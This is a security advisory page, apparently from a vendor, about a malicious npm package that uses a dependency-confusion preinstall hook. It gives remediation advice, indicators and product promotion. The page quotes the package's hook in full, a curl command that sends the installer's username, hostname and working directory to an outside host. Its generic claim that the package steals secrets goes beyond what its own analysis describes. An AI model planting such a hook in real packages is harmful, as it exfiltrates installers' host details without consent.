Which versions of mamadoos-test are malicious?

The following npm versions of mamadoos-test are flagged malicious: 10.0.0, 10.1.0, 11.0.0. Treat any of these as compromised.

How do I remediate mamadoos-test if I installed it?

mamadoos-test is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

I already installed mamadoos-test — how do I know if it already compromised me?

If mamadoos-test was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is mamadoos-test part of a known attack campaign?

Yes — mamadoos-test is associated with the IN-MAL-2026-003565, IN-MAL-2026-003566, IN-MAL-2026-003564, IN-MAL-2026-003560, IN-MAL-2026-003567, IN-MAL-2026-003559 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find mamadoos-test across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for mamadoos-test (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging mamadoos-test across your stack and pipelines.

Malicious package

mamadoos-testnpm

Malicious code in mamadoos-test (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4605

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall mamadoos-test

What this malware does

package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd), embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on npm install with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (mamadoos-test: ^10.0.0), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).

Malicious versions

3 flagged

10.0.010.1.011.0.0

Indicators of compromise (SHA-256)

2157659011628b870955375b0817f0efe48e349e33d56ce6df600fc2dd49b5b4

e902eada172d070291ec61612790e0c092d05c3b15e628f8f882c511421624bc

21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4

277d047f21aee2aec8b9d3cf07e8896540cb52a5422b8c8d23eebed8e53f2f75

6cc33157a1957f8c02515b475a6cf70c8340a8bd8c98dd8a748b8d9cb57bf595

b1f5386ccd6225cc257c44ad170e11b7ce8b580ba1d62877b71dbfdc41e0df49

Detection & response playbook

Credential / info stealer

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for mamadoos-test (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging mamadoos-test across your stack and pipelines.
If you installed it — respond
mamadoos-test is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If mamadoos-test was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks mamadoos-test before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. mamadoos-test on npm has been identified as a malicious package (versions 10.0.0, 10.1.0, 11.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-003565IN-MAL-2026-003566IN-MAL-2026-003564IN-MAL-2026-003560IN-MAL-2026-003567IN-MAL-2026-003559

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks mamadoos-test-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Malware detection Runtime egress monitoring